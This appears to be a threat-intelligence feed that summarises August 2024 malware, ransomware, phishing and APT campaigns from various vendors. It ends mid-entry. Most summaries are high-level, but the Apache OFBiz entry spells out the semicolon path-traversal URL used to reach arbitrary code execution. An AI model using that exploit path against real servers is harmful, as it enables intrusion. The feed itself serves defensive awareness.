Resilience researchers have uncovered that the North Korean threat group Kimsuky is targeting university staff, researchers, and professors to steal research and intelligence for the North Korean government, aligning with the goals of the Reconnaissance General Bureau (RGB), the country’s main intelligence agency. They are using a webshell called Green Dinosaur on compromised servers to control them and create phishing websites that mimic the real login pages of institutions like Dongduk University, Korea University, and Yonsei University.
Source: https://www.cyberresilience.com/threatintel/apt-group-kimsuky-targets-university-researchers/
2024-08-08
BlackSuit_Ransomware
MEDIUM
+
Intel Source:
CISA
Intel Name:
BlackSuit_Ransomware
Date of Scan:
2024-08-08
Impact:
MEDIUM
Summary:
CISA has updated its advisory on the Royal ransomware group to cover its rebranding as BlackSuit, and published the update on August 7, 2024. The update adds new tactics, techniques, and procedures (TTPs) as well as indicators of compromise (IOCs) and detection techniques for BlackSuit ransomware. The advisory now refers to BlackSuit instead of Royal except when mentioning prior Royal operations. Key updates and new information are highlighted.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a
2024-08-08
A_Deep_Dive_into_DeathGrip_RaaS
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
A_Deep_Dive_into_DeathGrip_RaaS
Date of Scan:
2024-08-08
Impact:
MEDIUM
Summary:
SentinelOne researchers have discovered a new RaaS group called DeathGrip, which emerged in June this year. DeathGrip provides advanced ransomware tools to individuals with minimal technical skills so they can launch ransomware attacks. The group promotes its services through Telegram and other underground forums. As of now, DeathGrip does not have a central site for leaking or selling victim data. Its ransomware payloads are distributed as self-extracting WinRAR bundles that contain a dropper batch file and a JPG file with the DeathGrip logo. The dropper retrieves and runs the ransomware from a remote server, which requires elevated permissions to encrypt files and display ransom notes.
Source: https://www.sentinelone.com/blog/deathgrip-raas-small-time-threat-actors-aim-high-with-lockbit-yashma-builders/
2024-08-08
Unmasking_Cronus_Ransomware
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
Unmasking_Cronus_Ransomware
Date of Scan:
2024-08-08
Impact:
MEDIUM
Summary:
Researchers at Seqrite Labs have discovered multiple global campaigns using fake PayPal lures to spread a new ransomware variant called Cronus. This ransomware is written in PowerShell and runs directly in memory without writing any malicious content to disk. The attack begins with a phishing email containing a blank Word document with malicious embedded VBA macros. These macros download a PowerShell-based loader, which then loads the ransomware.
Source: https://www.seqrite.com/blog/unmasking-cronus-how-fake-paypal-documents-deliver-fileless-ransomware-via-powershell/
2024-08-08
Latrodectus_and_ACR_Stealer
LOW
Intel Source:
Cyble
Intel Name:
Latrodectus_and_ACR_Stealer
Date of Scan:
2024-08-08
Impact:
LOW
Summary:
CRIL researchers have identified a phishing website masquerading as an official Google Safety Centre page. The site entices users to download malware that purports to be Google Authenticator but actually includes Latrodectus and ACR Stealer. ACR Stealer collects sensitive information and sends it to a C2 server, while Latrodectus uses evasion techniques to stay hidden on the victim's machine and continue malicious activity. When users download the fake authenticator from the malicious site, it shows a fake error message while secretly installing the malware. Additionally, the attackers abuse Google Ads to spread links to these phishing sites.
Source: https://cyble.com/blog/double-trouble-latrodectus-and-acr-stealer-observed-spreading-via-google-authenticator-phishing-site/
2024-08-08
StrRat_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
StrRat_Campaign
Date of Scan:
2024-08-08
Impact:
LOW
Summary:
Researchers from CERT-AGID have discovered a malware named StrRat. It's a Remote Access Trojan (RAT) that is written in Java and mainly used for stealing information. StrRat allows attackers to control the compromised machine remotely and has features for stealing passwords, recording keystrokes, and adding more plugins to extend its capabilities.
Source: https://cert-agid.gov.it/news/nuova-campagna-italiana-strrat-disponibile-una-ricetta-cyberchef-per-decodificare-il-malware/
2024-08-08
Emerging_Phishing_campaign_targeting_AWS_accounts
MEDIUM
Intel Source:
WIZ Blog
Intel Name:
Emerging_Phishing_campaign_targeting_AWS_accounts
Date of Scan:
2024-08-08
Impact:
MEDIUM
Summary:
Researchers at Wiz have discovered a phishing campaign in which attackers aim to steal AWS login credentials. The phishing email contains a PNG image that takes the user to a malicious website. The email is sent via Amazon SES, which indicates that the attackers are using an AWS account. The PDF file has an Invoice Summary link that redirects users through several websites, eventually leading to a fake AWS login page that steals credentials. This page contains JavaScript which might be controlled by the attackers or linked to the same AWS account used for sending the phishing emails.
Source: https://www.wiz.io/blog/emerging-phishing-campaign-targeting-aws-accounts
2024-08-08
A_New_APT_Group_Actor240524
MEDIUM
Intel Source:
NSFOCUS
Intel Name:
A_New_APT_Group_Actor240524
Date of Scan:
2024-08-08
Impact:
MEDIUM
Summary:
Researchers from NSFOCUS have discovered an attack campaign targeting Azerbaijan and Israel. After analyzing the tactics, attack vectors, weapons, and infrastructure, NSL concluded that the attack characteristics are unrelated to known APT groups. As a result, NSL links this campaign to a new APT organization, Actor240524, and refers to the new Trojan programs as ABCloader and ABCsync.
Source: https://nsfocusglobal.com/new-apt-group-actor240524-a-closer-look-at-its-cyber-tactics-against-azerbaijan-and-israel/
2024-08-08
CMoon_Malware_Spreads_via_Hacked_Websites
LOW
Intel Source:
Securelist
Intel Name:
CMoon_Malware_Spreads_via_Hacked_Websites
Date of Scan:
2024-08-08
Impact:
LOW
Summary:
Researchers from Kaspersky Lab have identified a new worm called CMoon. The worm can collect private and payment information from infected devices, download additional software, and perform DDoS attacks on certain Internet resources. The malware was spread via the legitimate website of a company that provides gasification and supply services to a city in the Russian Federation.
Source: https://securelist.ru/how-the-cmoon-worm-collects-data/109988/
2024-08-07
Lockbit_Ransomware_Stores_Mimikaz_on_Chinese_Infra
HIGH
Intel Source:
Linkedin
Intel Name:
Lockbit_Ransomware_Stores_Mimikaz_on_Chinese_Infra
Date of Scan:
2024-08-07
Impact:
HIGH
Summary:
Lockbit ransomware has been detected using Chinese infrastructure to deploy Mimikatz, a tool for extracting sensitive credentials, hashes and Kerberos tickets from Windows memory. The compromised systems, running Windows 8.1 or Windows Server 2012 R2 with Apache/2.4.56 and MariaDB, were found pulling Mimikatz during the infection process. The infrastructure involved, AS45090, is associated with multiple malicious tools, including Cobalt Strike, Supershell, Mozi, and BlackMoon.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_infosec-mimikatz-lockbit-activity-7226180119126495233-ZJa-/?utm_source=share&utm_medium=member_ios
2024-08-07
Unmasking_GoGra_Backdoor
LOW
Intel Source:
Symantec
Intel Name:
Unmasking_GoGra_Backdoor
Date of Scan:
2024-08-07
Impact:
LOW
Summary:
Researchers from Symantec have observed that the GoGra backdoor uses the Microsoft Graph API to interact with a C&C server hosted on Microsoft mail services. GoGra is configured to read messages from an Outlook user named "FNU LNU" whose subject line starts with the word "Input." It decrypts the message contents using the AES-256 algorithm. GoGra executes commands via the cmd.exe input stream and supports a "cd" command that changes the current directory. After executing a command, it encrypts the output and sends it to the same user with the subject "Output."
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/cloud-espionage-attacks
2024-08-07
RHADAMANTHYS_Stealer_Targeting_Israeli_Users
LOW
Intel Source:
Medium (Maordayanofficial)
Intel Name:
RHADAMANTHYS_Stealer_Targeting_Israeli_Users
Date of Scan:
2024-08-07
Impact:
LOW
Summary:
Researchers have uncovered a campaign in which the RHADAMANTHYS stealer is targeting Israeli users. The stealer first emerged in 2023, developed by Russian-speaking hackers and sold as Malware-as-a-Service on exclusive forums. The attack begins with an email in Hebrew that masquerades as communication from Calcalist and Mako, Israeli business newspapers and websites. The email has an urgent subject about copyright violations and uses professional language to appear legitimate. It demands action within 24 hours and includes an attachment disguised as important legal documents. The email also includes a password-locked RAR archive to avoid detection.
Source: https://maordayanofficial.medium.com/rhadamanthys-an-in-depth-analysis-of-a-sophisticated-stealer-targeting-israeli-users-330fbfd68f3b
2024-08-07
Mimic_ransomware_campaign_against_Indian_Entities
LOW
Intel Source:
Sophos
Intel Name:
Mimic_ransomware_campaign_against_Indian_Entities
Date of Scan:
2024-08-07
Impact:
LOW
Summary:
Sophos researchers have identified a new threat cluster called STAC6451 that targets exposed Microsoft SQL Server databases of large Indian organizations across various sectors in order to deploy ransomware. The attackers exploit SQL Servers exposed on the default port 1433 to gain unauthorized access and enable remote code execution. They use the Bulk Copy Program (BCP) utility to install malicious tools, including Cobalt Strike Beacons and Mimic ransomware.
Source: https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/
2024-08-07
Diving_Deep_into_Zola_Ransomware
MEDIUM
Intel Source:
Acronis
Intel Name:
Diving_Deep_into_Zola_Ransomware
Date of Scan:
2024-08-07
Impact:
MEDIUM
Summary:
Researchers from Acronis have determined that the Zola ransomware is a more recent version of the Proton ransomware family, which was first discovered in March 2023 and is well known for its constant evolution and rebranding. In addition to using a variety of techniques for memory token stealing, network scanning, and privilege escalation, Zola has a kill switch that terminates the process if it detects a Persian keyboard layout, which may indicate where the malware originated. It encrypts files and demands a ransom for their decryption, first using a combination of the AES and ECC algorithms and then ChaCha20. Moreover, Zola tries to obstruct recovery by erasing shadow copies and filling the disk with junk data.
Source: https://www.acronis.com/en-us/cyber-protection-center/posts/zola-ransomware-the-many-faces-of-the-proton-family/
2024-08-07
An_Overview_of_Lynx_Ransomware
MEDIUM
Intel Source:
Linkedin
Intel Name:
An_Overview_of_Lynx_Ransomware
Date of Scan:
2024-08-07
Impact:
MEDIUM
Summary:
Lynx Ransomware is Windows malware that has been active since mid-July 2024, and its data leak website lists American and British victims. The ransomware renames all encrypted files with the .lynx extension. It is written in Visual C++ and uses AES and Curve25519 for encryption. Notably, it also incorporates the BluTeal Dropper, an old tool first observed in 2017, and other known mutexes such as WERReportingForProcess2644 or AmiProviderMutex_InventoryApplicationFile. The group's data leak sites, accessible on both the Dark and Surface Web, use nginx/1.18.0 and ReactJS for their frontend, and the identity used for communication is likely Indonesian.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_lynx-lynxransomware-ransomware-activity-7224004702676377600-0EHr/?utm_source=share&utm_medium=member_ios
2024-08-07
Quad7_botnet_and_its_infrastructure
LOW
Intel Source:
TeamCymru
Intel Name:
Quad7_botnet_and_its_infrastructure
Date of Scan:
2024-08-07
Impact:
LOW
Summary:
Researchers from Team Cymru have discovered that the Quad7 threat operators have expanded their activities to include a new group of bots using port 63256, primarily affecting ASUS routers. They identified 12,783 active bots across the 7777 and 63256 botnets. The botnet uses seven key management IPs to control the devices and employs SOCKS5 proxies for attacks on Microsoft 365 accounts. While the 7777 botnet primarily targets TP-Link routers and IP cameras, the 63256 botnet focuses on ASUS routers.
Source: https://www.team-cymru.com/post/botnet-7777-are-you-betting-on-a-compromised-router
2024-08-06
Google_SaaS_Phishing_Campaign
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Google_SaaS_Phishing_Campaign
Date of Scan:
2024-08-06
Impact:
MEDIUM
Summary:
Researchers from PaloAlto have identified a phishing campaign that takes advantage of legitimate SaaS platforms, specifically Google Drawings and Google Slides, to conduct phishing attacks. The attackers create documents or presentations with these services, embedding malicious links that redirect victims to phishing pages designed to steal sensitive information. These phishing pages are crafted to mimic legitimate services, thereby deceiving users into entering their credentials or personal information, which are then captured by the attackers.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-08-05-Google-drawings-and-slides-abuse-for-phishing.txt
2024-08-06
Vidar_Malware_Returns_with_Malspam_Campaign
LOW
Intel Source:
CERT-AGID
Intel Name:
Vidar_Malware_Returns_with_Malspam_Campaign
Date of Scan:
2024-08-06
Impact:
LOW
Summary:
Researchers from CERT-AGID have discovered a widespread spam campaign spreading Vidar malware through Certified Email (PEC) mailboxes. Vidar is an infostealer capable of stealing passwords, cookies, credit card information, digital wallets, and login credentials once it infects a system. The attack, which took place overnight between August 5th and 6th, targeted many PEC users and reused a known template. The malicious emails contain a link that downloads a JavaScript file, which then runs a PowerShell script.
Source: https://cert-agid.gov.it/news/ritorna-vidar-in-italia-con-una-campagna-di-malspam-tramite-pec/
2024-08-06
Hackers_Hijack_Anti_Virus_Software
LOW
Intel Source:
LevelBlue Labs
Intel Name:
Hackers_Hijack_Anti_Virus_Software
Date of Scan:
2024-08-06
Impact:
LOW
Summary:
Researchers from LevelBlue Labs have identified that cybercriminals are now using real anti-virus software to carry out hidden attacks. They have created a tool called SbaProxy which looks like real anti-virus software but connects to a command-and-control server for malicious activity. The tool is distributed in multiple formats, including DLLs, EXEs and PowerShell scripts, and is hard to detect because it uses actual anti-virus components and valid certificates. It can be used for various malicious activities and may be sold for financial gain.
Source: https://cybersecurity.att.com/blogs/labs-research/hijacked-how-cybercriminals-are-turning-anti-virus-software-against-you
2024-08-06
Browser_Hijack_Trojan_Campaign
MEDIUM
Intel Source:
Reason Labs
Intel Name:
Browser_Hijack_Trojan_Campaign
Date of Scan:
2024-08-06
Impact:
MEDIUM
Summary:
Researchers at Reason Labs have identified a sophisticated attack involving a polymorphic extension trojan targeting users of popular web browsers such as Google Chrome and Microsoft Edge. The malware has been operating since 2017 through fake websites posing as legitimate download sites for software such as Roblox FPS Unlocker or VLC Media Player. Once downloaded, the malware installs itself as an unremovable browser extension that hijacks search queries and steals sensitive information.
Source: https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign
2024-08-06
Beware_of_Fake_WinRar_Websites
LOW
Intel Source:
Sonicwall
Intel Name:
Beware_of_Fake_WinRar_Websites
Date of Scan:
2024-08-06
Impact:
LOW
Summary:
SonicWall researchers have observed a fake website that appears to distribute WinRar, a data compression, encryption, and archiving utility for Windows, but actually hosts malware. The fraudulent website uses typosquatting, closely mimics the official website, and preys on users who mistype the URL of this well-known archiving program. The initial malware then leads to a series of malicious components hosted on GitHub, including ransomware, a cryptominer and an infostealer.
Source: https://blog.sonicwall.com/en-us/2024/08/beware-of-fake-winrar-websites-malware-hosted-on-github/
2024-08-06
Mispadu_Banking_Trojan
LOW
Intel Source:
Rewterz
Intel Name:
Mispadu_Banking_Trojan
Date of Scan:
2024-08-06
Impact:
LOW
Summary:
Researchers from Rewterz have uncovered spam campaigns spreading the URSA/Mispadu banking trojan, which steals credentials from users' machines. The malware targets systems configured for Spanish and Portuguese and affects users in Mexico, Spain, Portugal, and nearby regions. The attack uses spam emails about overdue invoices to trick users into downloading a ZIP file from malicious links. The file contains an installer with a VBScript that hides the malware behind layers of obfuscation. If the script detects a virtual environment, it terminates its execution.
Source: https://www.rewterz.com/threat-advisory/mispadu-banking-trojan-active-iocs
2024-08-06
Uncovering_SAC_and_SmartScreen_Issues
LOW
Intel Source:
Elastic Security Labs
Intel Name:
Uncovering_SAC_and_SmartScreen_Issues
Date of Scan:
2024-08-06
Impact:
LOW
Summary:
Researchers from Elastic Security Labs have identified several fundamental design weaknesses in Smart App Control and SmartScreen. These weaknesses can allow initial access with no security warnings and minimal user interaction. Smart App Control is a cloud-powered security feature introduced by Microsoft in Windows 11, designed to block malicious, untrusted, and potentially unwanted apps from running on the system.
Source: https://www.elastic.co/security-labs/dismantling-smart-app-control
2024-08-06
New_SharpRhino_Malware
MEDIUM
Intel Source:
Quorum Cyber
Intel Name:
New_SharpRhino_Malware
Date of Scan:
2024-08-06
Impact:
MEDIUM
Summary:
A new Remote Access Trojan (RAT) referred to as SharpRhino has been detected and investigated by Quorum Cyber researchers; it is linked to the Hunters International ransomware group. The group's activity has been traced back to October 2023, and its origins are believed to lie in the Russian-based Hive ransomware group, which collapsed. SharpRhino is an advanced C# malware delivered via a typosquatted domain masquerading as the legitimate Angry IP Scanner software. As soon as the malware is executed, it sets up persistence on the infected machine and gives the attacker remote control.
Source: https://www.quorumcyber.com/insights/sharprhino-new-hunters-international-rat-identified-by-quorum-cyber/
2024-08-06
North_Korean_Hackers_Exploit_VPN_Flaws
MEDIUM
Intel Source:
NCSC
Intel Name:
North_Korean_Hackers_Exploit_VPN_Flaws
Date of Scan:
2024-08-06
Impact:
MEDIUM
Summary:
South Korea's National Cyber Security Center (NCSC) has reported that North Korean hackers, specifically the groups Kimsuky (APT43) and Andariel (APT45), have exploited vulnerabilities in a VPN software update to deploy malware and breach networks. This attack is linked to North Korea's recent initiative to modernize industrial factories, with the aim of stealing trade secrets from South Korea. The NCSC notes the unprecedented coordination of these groups targeting the same sector simultaneously for strategic objectives.
Source: https://www.documentcloud.org/documents/25031724-240805_saibeoanbo_jeongbogongdongce_habdongboangweongomun
2024-08-06
MeterPreter_Malware
LOW
Intel Source:
Rewterz
Intel Name:
MeterPreter_Malware
Date of Scan:
2024-08-06
Impact:
LOW
Summary:
Researchers at Rewterz have identified a malware called Meterpreter that allows attackers to take remote control of compromised machines. The malware injects itself into existing processes rather than creating new ones. Attackers can use Meterpreter to send and receive files, execute commands, take screenshots and log keystrokes. It is commonly spread through infected email attachments, malicious ads, and social engineering. Additionally, attackers can use Meterpreter to deliver further malware such as ransomware, which encrypts data until a ransom is paid. The primary risks associated with Meterpreter include identity theft and the theft of banking information and passwords.
Source: https://www.rewterz.com/threat-advisory/meterpreter-malware-active-iocs-3
2024-08-05
A_Novel_Discord_DDoS_Campaign_Called_Panamorfi
LOW
Intel Source:
Aquasec
Intel Name:
A_Novel_Discord_DDoS_Campaign_Called_Panamorfi
Date of Scan:
2024-08-05
Impact:
LOW
Summary:
Researchers at Aqua Nautilus have identified a new Distributed Denial of Service (DDoS) campaign named Panamorfi. The attack leverages a Java-based Minecraft DDoS package called Mineping. So far the campaign has been observed launching its DDoS attacks from misconfigured Jupyter notebooks.
Source: https://www.aquasec.com/blog/panamorfi-a-new-discord-ddos-campaign/
2024-08-05
New_VBS_Obfuscation_Technique_For_Remcos_RAT
LOW
Intel Source:
ISC.SANS
Intel Name:
New_VBS_Obfuscation_Technique_For_Remcos_RAT
Date of Scan:
2024-08-05
Impact:
LOW
Summary:
A recent analysis of a VBS file delivering the Remcos RAT revealed a novel obfuscation technique in which numerous repeated functions and comments were used to mask the real payload. With so much superfluous code, it was very difficult for anyone scanning the script to locate the malicious payload. Even though the script contained repeated definitions, it still executed without errors, likely because Windows Script Host overwrote the earlier function definitions. Once the duplicate lines were removed, the payload could be seen clearly despite all of these hiding techniques.
Source: https://isc.sans.edu/diary/rss/31144
2024-08-05
Quasar_RAT
LOW
Intel Source:
Hunt.IO
Intel Name:
Quasar_RAT
Date of Scan:
2024-08-05
Impact:
LOW
Summary:
The Quasar RAT is an open-source remote access trojan (RAT) that targets Windows devices. Cybercriminals use it to gain unauthorized remote control of compromised machines, spy on their users, steal their data, and run other software. The discovery of Quasar RAT dates back to about 2015. It soon acquired popularity in the cybersecurity field since it was open source, allowing anyone to alter or adapt it to their specific requirements.
Source: https://x.com/huntio/status/1820061868515549464?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-08-05
Exposing_the_Dark_Angels_Ransomware_Group
LOW
Intel Source:
Linkedin
Intel Name:
Exposing_the_Dark_Angels_Ransomware_Group
Date of Scan:
2024-08-05
Impact:
LOW
Summary:
A ransomware group called Dark Angels, first observed in May 2022, became widely known after its data leaks were discovered in February 2023. The group has targeted 13 victims, 9 of them based in the United States, focusing on sensitive companies in industries such as manufacturing, construction, transport and logistics, trade services, and information technology. The group claims to use advanced ransomware, but it has been linked to Babuk Ransomware and the RagnarLocker group, and code analysis indicates elements of HelloKitty.
Source: https://www.linkedin.com/posts/rakesh-krishnan-6179a94b_darkangels-ransomware-malware-activity-7225381761453584384-50wD/
2024-08-02
Fighting_Ursa_Luring_Targets_With_Car_for_Sale
LOW
Intel Source:
Palo Alto
Intel Name:
Fighting_Ursa_Luring_Targets_With_Car_for_Sale
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
Palo Alto researchers have discovered a campaign in which the Russian threat actor Fighting Ursa (also known as APT28, Fancy Bear, and Sofacy) targets diplomats with a fake car advertisement to spread HeadLace malware. The actor uses a legitimate service, Webhook.site, to host a malicious URL that delivers malicious HTML. This HTML checks whether the visitor's computer is Windows-based: if so, it creates a ZIP file; otherwise it redirects to a decoy image hosted on ImgBB, another legitimate service. The decoy is an ad for an Audi Q7 titled "Diplomatic Car for Sale," with fake contact details to appear credible. The campaign highlights Fighting Ursa's continued reuse of successful tactics, including ones borrowed from other groups.
Source: https://unit42.paloaltonetworks.com/fighting-ursa-car-for-sale-phishing-lure/
2024-08-02
Attacker_Linked_With_DPRK_Leveraging_NPM
LOW
Intel Source:
DATADOG
Intel Name:
Attacker_Linked_With_DPRK_Leveraging_NPM
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
On July 7, 2024, the npm user nagasiren978 uploaded two malicious packages, harthat-hash and harthat-api, to the npm registry. These packages contain code that installs additional malware, designed for Windows systems, from a command and control (C2) server. The tactics and infrastructure used in this attack closely resemble those of the MOONSTONE SLEET threat actor associated with North Korea. The cluster is also known as Stressed Pungsan, a name referencing the DPRK's national dog breed, the Pungsan.
Source: https://securitylabs.datadoghq.com/articles/stressed-pungsan-dprk-aligned-threat-actor-leverages-npm-for-initial-access/
2024-08-02
Analyzing_BITSLOTH_Backdoor
LOW
Intel Source:
Elastic Security Labs
Intel Name:
Analyzing_BITSLOTH_Backdoor
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
Researchers at Elastic Security Labs have discovered a Windows backdoor (BITSLOTH) that abuses the Background Intelligent Transfer Service (BITS) for C2. The malware was found during a recent investigation of an activity group tracked as REF8747. At the time of publication, the most recent iteration of the backdoor has 35 handler functions, including keylogging and screen capture capabilities. In addition, BITSLOTH includes a variety of capabilities for discovery, enumeration, and command-line execution.
Source: https://www.elastic.co/security-labs/bits-and-bytes-analyzing-bitsloth
2024-08-02
Malicious_Python_Packages_Targeting_Crypto_Users
LOW
Intel Source:
Checkmarx
Intel Name:
Malicious_Python_Packages_Targeting_Crypto_Users
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
Researchers from Checkmarx have observed that multiple malicious Python packages are being uploaded to PyPI, targeting cryptocurrency users who utilize Raydium and Solana. The attacker used StackExchange as a primary vector to lure users to their malicious package. Additionally, the multi-stage malware exfiltrated extensive sensitive data and assisted in the theft of victims' cryptocurrency wallets.
Source: https://checkmarx.com/blog/stackexchange-abused-to-spread-malicious-python-package-that-drains-victims-crypto-wallets/
2024-08-02
StormBamboo_Hacks_ISP_to_Exploit_Software_Updates
LOW
Intel Source:
Volexity
Intel Name:
StormBamboo_Hacks_ISP_to_Exploit_Software_Updates
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
Researchers from Volexity have discovered that the threat actor StormBamboo, also known as Evasive Panda, compromises multiple systems by tampering with DNS responses at the ISP level. The activity affects both macOS and Windows systems across various organizations. StormBamboo alters DNS responses for domains linked to automatic software update mechanisms that do not require digital signatures. As a result, update requests are redirected to the actor's own malicious servers, which deliver malware such as MACMA and POCOSTICK.
Source: https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/
2024-08-02
Bloody_Wolf_Target_Kazakhstan_with_STRRAT
LOW
Intel Source:
BI Zone
Intel Name:
Bloody_Wolf_Target_Kazakhstan_with_STRRAT
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
Researchers at BI.ZONE have identified activity by Bloody Wolf targeting organizations in Kazakhstan using the STRRAT malware, also known as Strigoi Master. The attackers send phishing emails on behalf of the Ministry of Finance of Kazakhstan and other official agencies that claim to be non-compliance notices and include links to malicious JAR files. These links redirect through a legitimate government website that encourages users to install Java in order to access the e-government portal.
Source: https://bi.zone/eng/expertise/blog/bloody-wolf-primenyaet-kommercheskoe-vpo-strrat-protiv-organizatsiy-v-kazakhstane/
2024-08-02
Mint_Stealer
LOW
Intel Source:
Coinmonks
Intel Name:
Mint_Stealer
Date of Scan:
2024-08-02
Impact:
LOW
Summary:
Mint Stealer is a Python stealer that typically stays in the background and doesn't attract much attention. After infecting a victim's machine, it can retrieve confidential data from that system.
Source: https://medium.com/coinmonks/mint-stealer-running-by-a-bulletproof-hoster-0983df47a411
2024-08-01
How_Cybercriminals_Acquire_and_Deploy_Ransomware
LOW
Intel Source:
Securelist
Intel Name:
How_Cybercriminals_Acquire_and_Deploy_Ransomware
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Securelist researchers have analyzed ransomware activity and found that cybercriminals usually do not create their own ransomware samples but obtain them from various sources. They can buy samples on the dark web, form alliances with other groups, or use leaked versions of ransomware. With traditional tools and modified ransomware samples, these criminals can easily target victims and spread malware.
Source: https://securelist.com/sexi-key-group-mallox-ransomware/113183/
2024-08-01
How_AitM_Phishing_Kits_Evade_Detection
LOW
Intel Source:
Push Security
Intel Name:
How_AitM_Phishing_Kits_Evade_Detection
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Push Security researchers have explored the NakedPages AitM phishing toolkit and the tactics it uses to avoid detection. As MFA becomes increasingly widespread, AitM phishing is on the rise, and NakedPages has become a classic example. The toolkit uses tactics such as abusing legitimate SaaS services to obscure malicious operations. This case study shows how effective AitM toolkits often are at evading threat detection, frequently appearing seamless and very quick from the victim's point of view.
Source: https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection/
2024-08-01
Banking_Trojans_Targeting_Global_Banks
LOW
Intel Source:
ForcePoint
Intel Name:
Banking_Trojans_Targeting_Global_Banks
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Researchers from Forcepoint have observed that banking trojans are evolving quickly and impacting large banks worldwide. The malware is distributed via geo-fenced URLs embedded in email, with the main goal of stealing credentials from the victim's system, which it infects through process injection using AutoIt scripts and tools.
Source: https://www.forcepoint.com/blog/x-labs/malware-lurking-behind-secureserver-net-urls
2024-08-01
Hackers_Abusing_Cloudflare_Tunnels_to_Deliver_RATs
LOW
Intel Source:
Proofpoint
Intel Name:
Hackers_Abusing_Cloudflare_Tunnels_to_Deliver_RATs
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Researchers at Proofpoint have noticed a surge in cybercriminal activity that uses Cloudflare Tunnels to spread malware. In particular, the activity makes use of TryCloudflare functionality, which lets an attacker establish a one-time tunnel without registering. Similar to a virtual private network (VPN) or the secure shell (SSH) protocol, tunnels allow remote access to files and resources that are not on the user's local network.
Source: https://www.proofpoint.com/us/blog/threat-insight/threat-actor-abuses-cloudflare-tunnels-deliver-rats
2024-08-01
MacOS_Malware_Pose_as_Unarchiver_App
LOW
Intel Source:
Hunt.IO
Intel Name:
MacOS_Malware_Pose_as_Unarchiver_App
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Researchers at Push Security, during routine research, discovered a fraudulent site mimicking the legitimate theunarchiver[.]com. The site, tneunarchiver[.]com, closely replicates the real one but features a deceptive download button. Upon clicking the button, unsuspecting users download a malicious disk image named TheUnarchiver.dmg that poses as the real application. The Unarchiver is a trusted tool for extracting various archive formats on Mac: it extracts RAR files, unzips ZIP files, and handles dozens of other formats.
Source: https://hunt.io/blog/macos-malware-impersonates-the-unarchiver-app-to-steal-user-data
2024-08-01
Social_Media_Malvertising_Campaign
LOW
Intel Source:
Trend Micro
Intel Name:
Social_Media_Malvertising_Campaign
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered a campaign in which threat actors hijack social media pages and rename them to pose as a legitimate AI photo editor. They post fake links on these pages and promote them through paid ads. The scammers first send spam messages with phishing links to page admins, leading to a fake account page that tricks them into providing their login details. Once they control a page, they use it to push ITarian software that executes malware called Lumma Stealer, which steals sensitive data such as cryptocurrency wallet files, browser data, and password manager databases.
Source: https://www.trendmicro.com/en_us/research/24/h/malvertising-campaign-fake-ai-editor-website-credential-theft.html
2024-08-01
APT_41_Target_Taiwanese_government_Institute
LOW
Intel Source:
Cisco Talos
Intel Name:
APT_41_Target_Taiwanese_government_Institute
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Cisco Talos researchers have discovered a campaign in which a threat actor compromised a Taiwanese government research institute using ShadowPad malware, Cobalt Strike, and other customized tools. The attack is attributed to the Chinese hacking group APT41 based on its tactics and tools. In this campaign, the attacker exploits an outdated Microsoft Office IME vulnerability to load the ShadowPad malware and uses a unique Cobalt Strike loader to evade Windows Defender. The actor also created a dedicated loader to exploit a vulnerability (CVE-2018-0824) for local privilege escalation.
Source: https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/
2024-08-01
A_Rise_in_Attacks_Against_Apache_OFBiz
LOW
+
Intel Source:
ISC.SANS
Intel Name:
A_Rise_in_Attacks_Against_Apache_OFBiz
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
In May, a critical security vulnerability (CVE-2024-32113) was addressed in OFBiz, the Apache Foundation's Java-based ERP framework. The flaw, which affected versions before 18.12.13, was a path traversal issue capable of leading to remote command execution. Exploitation was simple: attackers added a semicolon to a generic URL such as /webtools/control/forgotPassword;/ProgramExport. Notably, "forgotPassword" is publicly accessible, while "ProgramExport" permits arbitrary program code execution. Although a POST request is required, that requirement can be satisfied by injecting a URL parameter, and this form of attack has recently been observed in active use.
Source: https://isc.sans.edu/diary/Increased+Activity+Against+Apache+OFBiz+CVE202432113/31132/
2024-08-01
Surge_in_Tech_Support_Scams
LOW
+
Intel Source:
PaloAlto
Intel Name:
Surge_in_Tech_Support_Scams
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
Researchers from PaloAlto have identified, since June 2024, a significant rise in hits on fake web pages designed to make users believe their systems have been hacked and to call fake tech support numbers. The scams mainly target Windows users, but macOS users are also affected. Typically, these scam pages display phone numbers from Japan and the USA.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-07-31-increase-of-tech-support-scam-URLs.txt
2024-08-01
NetSupport_RAT_Campaign
LOW
+
Intel Source:
Cisco Talos
Intel Name:
NetSupport_RAT_Campaign
Date of Scan:
2024-08-01
Impact:
LOW
Summary:
